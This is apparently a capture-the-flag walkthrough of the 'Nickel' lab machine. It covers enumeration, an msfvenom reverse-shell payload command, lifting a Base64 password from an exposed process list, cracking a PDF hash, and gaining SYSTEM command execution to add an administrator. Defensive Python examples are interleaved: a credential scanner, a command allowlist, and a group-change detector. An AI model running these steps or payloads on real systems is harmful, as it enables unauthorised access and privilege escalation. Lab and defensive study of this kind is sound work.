# Nickel

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.90.99 -t full`

`nmapAutomator.sh -H 192.168.90.99 -t vulns`

![](/files/-Madc9yBhBUXjngbfuWQ)

### SMB (139)

![](/files/-MadcCdnJ2Tdv72s319q)

`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python`

### HTTP

On port 8089, we have a dashboard:

![](/files/-MadcG24-jf27BIrOFQ5)

Each of the links brings us to 169.254.109.39:33333. By going to 192.168.90.99:33333 instead, we get a Not Found response for `/list-current-deployments`.

![](/files/-MadcIjCMFd_4CHnHxkV)

We get a different message, however, for `/list-running-procs`.

![](/files/-MadcLDizjz-8OVQZ--g)

If we send a POST request instead, we indeed see a list of running processes!

![](/files/-MadcNzZ2sGBG42VwDgl)

In the command line of one of the processes, we get a user's credentials.

![](/files/-MadcRXrAms03CEPU5E2)

Plugging the `-p` parameter into CyberChef, we can see that it is a Base64-encoded password (`NowiseSloopTheory139`).

![](/files/-MadcdpGKznO8df7REyT)
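A defender can hunt for this class of exposure before anyone else reads the process list. The following is an added example (not part of the original write-up) that scans process command lines for credential-bearing flags and `key=value` pairs, classifies each value as plain or Base64-encoded, and reports it masked so the report itself does not leak the secret. The sample command lines, the tool names and the flag list are constructed for the example and are not from the target.

```python
import base64
import binascii
import re
import shlex

# Flags that commonly carry a credential on the command line. Assumption: this
# list is illustrative; extend it for the tooling in your own environment.
CREDENTIAL_FLAGS = {"-p", "-pw", "-pass", "--password", "--pass", "/p", "/password"}
CREDENTIAL_KEYS = re.compile(r"^(?:password|passwd|pwd|pass|secret|token)=(.+)$", re.IGNORECASE)
BASE64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

# Constructed sample of process command lines, in the shape a process-listing
# endpoint might return. None of these are real processes or real secrets.
SAMPLE_PROCESSES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\tools\deploy.exe -u deployuser -p ZXhhbXBsZS1wYXNzd29yZA==",
    r"C:\tools\backup.exe --target \\fileserver\share password=PlainText1",
    r'"C:\Program Files\Agent\agent.exe" -p 8080 --log C:\logs\agent.log',  # -p is a port here
]


def classify_secret(value):
    """Return ('base64', decoded) when value is a Base64 blob that decodes to
    printable text, otherwise ('plain', value)."""
    if BASE64_SHAPE.match(value) and len(value) % 4 == 0:
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return "plain", value
        if decoded.isprintable():
            return "base64", decoded
    return "plain", value


def mask(secret):
    """Keep only the first two characters so a finding does not re-expose the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_exposed_credentials(command_lines):
    """Scan each command line for credential flags or key=value pairs.
    Purely numeric values (ports, counts) are ignored to reduce noise."""
    findings = []
    for line in command_lines:
        # posix=False keeps Windows backslashes literal instead of treating them as escapes
        tokens = shlex.split(line, posix=False)
        for i, tok in enumerate(tokens):
            flag, value = None, None
            if tok.lower() in CREDENTIAL_FLAGS and i + 1 < len(tokens):
                flag, value = tok, tokens[i + 1]
            else:
                m = CREDENTIAL_KEYS.match(tok)
                if m:
                    flag, value = tok.split("=", 1)[0], m.group(1)
            if value is None or value.isdigit():
                continue
            encoding, secret = classify_secret(value)
            findings.append({
                "process": tokens[0],
                "flag": flag,
                "encoding": encoding,
                "secret_masked": mask(secret),
                "secret_length": len(secret),
            })
    return findings


if __name__ == "__main__":
    for finding in find_exposed_credentials(SAMPLE_PROCESSES):
        print(finding)
```

Run it against the output of a process listing (`tasklist /v` style exports or an endpoint like the one above) on a schedule; any hit is a finding regardless of whether the value is encoded, since Base64 is not encryption and the page shows how quickly it is reversed.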

Using the credentials `ariah:NowiseSloopTheory139`, we can SSH into the server.

![](/files/-Madch-rRynNWf0WllFA)

![](/files/-MadcjyL3e0d8NQGSs-G)

## Privilege Escalation

Using previously found credentials for `ariah`, we can access the FTP service and download a PDF file.

![](/files/-MadcmxlNY5XHeNWPUXD)

However, a password is required. The previously found password does not work.

![](/files/-MadcusSzyGqmXlTzxho)

Use `pdf2john.pl` to extract the hash.

`perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt`

Use John the Ripper to crack the hash.

`john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt`

![](/files/-Madd2d3-dAp4dFUQAu5)

The password is `ariah4168`.

In the PDF, we find a 'Temporary Command endpoint' at `http://nickel/` that is only accessible from the remote machine itself.

![](/files/-MaddNfwv6V0xyZ6_Cp8)

Using PowerShell, we can send a GET request to the API endpoint.

`$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing`

This executes `whoami`, and we can see the output below.

![](/files/-MaddeooDXYRfVag101z)

We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing: add ourselves to the `Administrators` group.
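The root cause here is an HTTP endpoint that treats its query string as a command and runs it as SYSTEM; binding it to the local machine only limits who can reach it, not what it does or whose privileges it runs with. The following added example (not part of the original write-up and not the real service's code) contrasts that pattern with a dispatcher that maps a named action to a fixed argv and refuses everything else. The action names and argv values, including the `deploytool` command, are assumptions made for the example.

```python
import subprocess
from urllib.parse import unquote, urlsplit


# Anti-pattern, shown only for contrast: the raw query string becomes a shell
# command, so GET /?whoami runs whoami with the privileges of the service.
def run_query_unsafe(url):
    command = unquote(urlsplit(url).query)
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


# Hardened form: the client picks a named action, the server owns the argv.
# Assumption: these actions and commands are illustrative, not the real service's.
ALLOWED_ACTIONS = {
    "list-running-procs": ["tasklist"],
    "list-current-deployments": ["deploytool", "list"],
}


def resolve_action(url):
    """Map the request's query string to a fixed argv list, or None if the
    action is not on the allowlist. Because the result is an argv list and
    never a shell string, nothing from the request is interpolated."""
    action = unquote(urlsplit(url).query)
    argv = ALLOWED_ACTIONS.get(action)
    return list(argv) if argv else None


def run_action(url):
    """Return (status, body). Unknown or decorated actions are refused outright."""
    argv = resolve_action(url)
    if argv is None:
        return 403, "action not allowed"
    try:
        proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    except FileNotFoundError:
        return 500, "command unavailable on this host"
    return 200, proc.stdout


if __name__ == "__main__":
    for request in ("http://nickel/?whoami", "http://nickel/?list-running-procs"):
        print(request, "->", resolve_action(request))
```

Even with the allowlist, the worker that executes the actions should run under a dedicated low-privilege service account rather than SYSTEM, and "temporary" endpoints like this one need an owner and a removal date, since the PDF on this machine documented it well after it should have been gone.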

`net localgroup Administrators ariah /add`

![](/files/-Maddi-WO9AwVUhIlUY3)

If we check the Administrators group again (`net localgroup Administrators`), we can see that our user `ariah` was added.

![](/files/-Madf3eW89-4k9VCyTkd)
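From the blue-team side, this step is one of the noisiest a local attacker can take: Windows records event 4732 ("A member was added to a security-enabled local group") in the Security log with the actor, the member and the group's SID (4728 and 4756 are the global and universal group equivalents). The following added example (not part of the original write-up) scans a constructed JSON-lines export of such events and alerts on additions to BUILTIN\Administrators, raising severity when the actor is SYSTEM or another service identity, which is what an addition made through a SYSTEM-level command endpoint looks like. The field names follow the event's EventData fields; the records, host name, SIDs and actor list are constructed.

```python
import json

# "A member was added to a security-enabled ... group": 4728 global, 4732 local, 4756 universal.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
# Well-known SID of BUILTIN\Administrators; matching on the SID rather than the
# name survives localized or renamed groups.
ADMINISTRATORS_SID = "S-1-5-32-544"
# Identities that should not be adding local administrators on their own.
# Assumption: tune this set to your environment (installers can be legitimate).
SUSPICIOUS_ACTORS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}

# Constructed JSON-lines export of Security events. Real 4732 events often
# carry "-" in MemberName and the account's SID in MemberSid, so both are handled.
SAMPLE_EVENTS = [
    '{"EventID": 4624, "SubjectUserName": "ariah", "LogonType": 10}',
    '{"EventID": 4732, "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY", '
    '"MemberName": "NICKEL\\\\ariah", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1001", '
    '"TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}',
    '{"EventID": 4732, "SubjectUserName": "helpdesk", "SubjectDomainName": "NICKEL", '
    '"MemberName": "NICKEL\\\\printop", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1102", '
    '"TargetUserName": "Print Operators", "TargetSid": "S-1-5-32-550"}',
    '{"EventID": 4732, "SubjectUserName": "itadmin", "SubjectDomainName": "NICKEL", '
    '"MemberName": "-", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1105", '
    '"TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}',
]


def detect_admin_group_additions(lines):
    """Return one alert per group-membership event that targets BUILTIN\\Administrators."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") not in GROUP_ADD_EVENTS:
            continue
        if ev.get("TargetSid") != ADMINISTRATORS_SID:
            continue
        actor = ev.get("SubjectUserName", "")
        member = ev.get("MemberName")
        if member in (None, "-"):
            member = ev.get("MemberSid")
        severity = "critical" if actor.upper() in SUSPICIOUS_ACTORS else "high"
        alerts.append({
            "event_id": ev["EventID"],
            "member": member,
            "actor": f'{ev.get("SubjectDomainName", "")}\\{actor}',
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_admin_group_additions(SAMPLE_EVENTS):
        print(alert)
```

Pair the alert with the preceding process or HTTP activity on the host: a group change whose subject is SYSTEM with no installer or management agent running at that moment is the signal that a service is executing attacker-chosen commands, and the member it added is the account to lock and investigate first.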

Now, we can RDP into the machine and run the command prompt as Administrator.

![](/files/-MadfTe8Yr3A1hWHFp7y)

